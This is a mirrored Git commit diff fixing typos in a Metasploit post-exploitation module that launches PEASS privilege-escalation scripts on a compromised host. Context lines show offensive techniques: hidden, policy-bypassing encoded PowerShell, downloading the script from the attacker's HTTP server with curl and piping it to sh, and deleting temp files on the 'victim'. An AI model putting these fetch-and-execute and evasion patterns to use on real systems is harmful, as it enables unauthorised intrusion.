mirror of
https://github.com/carlospolop/PEASS-ng
synced 2024-11-24 01:26:22 +01:00
Update peass.rb
Fix typos, grammar and misspelled words.
This commit is contained in:
parent
41e2367be6
commit
6525727ca9
@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post
|
||||
'Name' => 'Multi PEASS launcher',
|
||||
'Description' => %q{
|
||||
This module will launch the indicated PEASS (Privilege Escalation Awesome Script Suite) script to enumerate the system.
|
||||
You need to indicate the URL or local path to LinPEAS if you are in some Unix or to WinPEAS if you are in Windows.
|
||||
You need to indicate the URL or local path to LinPEAS if you are on any Unix-based system or to WinPEAS if you are on Windows.
|
||||
By default this script will upload the PEASS script to the host (encrypted and/or encoded) and will load, deobfuscate, and execute it.
|
||||
You can configure this module to download the encrypted/encoded PEASS script from this metasploit instance via HTTP instead of uploading it.
|
||||
},
|
||||
@ -56,14 +56,14 @@ class MetasploitModule < Msf::Post
|
||||
|
||||
# Load PEASS script in memory
|
||||
peass_script = load_peass()
|
||||
print_good("PEASS script successfully retreived.")
|
||||
print_good("PEASS script successfully retrieved.")
|
||||
|
||||
# Obfuscate loaded PEASS script
|
||||
if datastore["PASSWORD"].length > 1
|
||||
# If no Windows, check if openssl exists
|
||||
if !session.platform.include?("win")
|
||||
openssl_path = cmd_exec("command -v openssl")
|
||||
raise 'openssl not found in victim, unset the password of the module!' unless openssl_path.include?("openssl")
|
||||
raise 'openssl not found on victim, unset the password of the module!' unless openssl_path.include?("openssl")
|
||||
end
|
||||
|
||||
# Get encrypted PEASS script in B64
|
||||
@ -97,7 +97,7 @@ class MetasploitModule < Msf::Post
|
||||
# If no Windows, check if base64 exists
|
||||
if !session.platform.include?("win")
|
||||
base64_path = cmd_exec("command -v base64")
|
||||
raise 'base64 not found in victim, set a 32B length password!' unless base64_path.include?("base64")
|
||||
raise 'base64 not found on victim, set a 32B length password!' unless base64_path.include?("base64")
|
||||
end
|
||||
|
||||
# Encode PEASS script
|
||||
@ -146,7 +146,7 @@ class MetasploitModule < Msf::Post
|
||||
last_cmd = " ; rm #{temp_path}"
|
||||
end
|
||||
|
||||
# Instead of writting the file to disk, download it from HTTP
|
||||
# Instead of writing the file to disk, download it from HTTP
|
||||
else
|
||||
last_cmd = ""
|
||||
# Start HTTP server
|
||||
@ -159,13 +159,13 @@ class MetasploitModule < Msf::Post
|
||||
url_download_peass = http_protocol + http_ip + http_port + http_path
|
||||
print_good("Listening in #{url_download_peass}")
|
||||
|
||||
# Configure the download of the scrip in Windows
|
||||
# Configure the download of the script in Windows
|
||||
if session.platform.include?("win")
|
||||
cmd = "$ProgressPreference = 'SilentlyContinue';"
|
||||
cmd += get_bypass_tls_cert()
|
||||
cmd += "$#{ps_var1} = Invoke-WebRequest \"#{url_download_peass}\" -UseBasicParsing | Select-Object -ExpandProperty Content;"
|
||||
|
||||
# Configure the download of the scrip in unix
|
||||
# Configure the download of the script in Unix
|
||||
else
|
||||
cmd = "curl -k -s \"#{url_download_peass}\""
|
||||
curl_path = cmd_exec("command -v curl")
|
||||
@ -193,7 +193,7 @@ class MetasploitModule < Msf::Post
|
||||
|
||||
tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"].to_i)
|
||||
|
||||
# If unix, then, suppose linpeas was loaded
|
||||
# If Unix, then, suppose linpeas was loaded
|
||||
else
|
||||
cmd += "| #{decode_linpeass_cmd}"
|
||||
cmd += "| sh -s -- #{datastore['PARAMETERS']}"
|
||||
@ -259,7 +259,7 @@ class MetasploitModule < Msf::Post
|
||||
end
|
||||
|
||||
def aes_enc_peass(peass_script)
|
||||
# Encrypt the PEASS script with aes
|
||||
# Encrypt the PEASS script with AES (CBC Mode)
|
||||
key = datastore["PASSWORD"]
|
||||
iv = OpenSSL::Cipher::Cipher.new('aes-256-cbc').random_iv
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user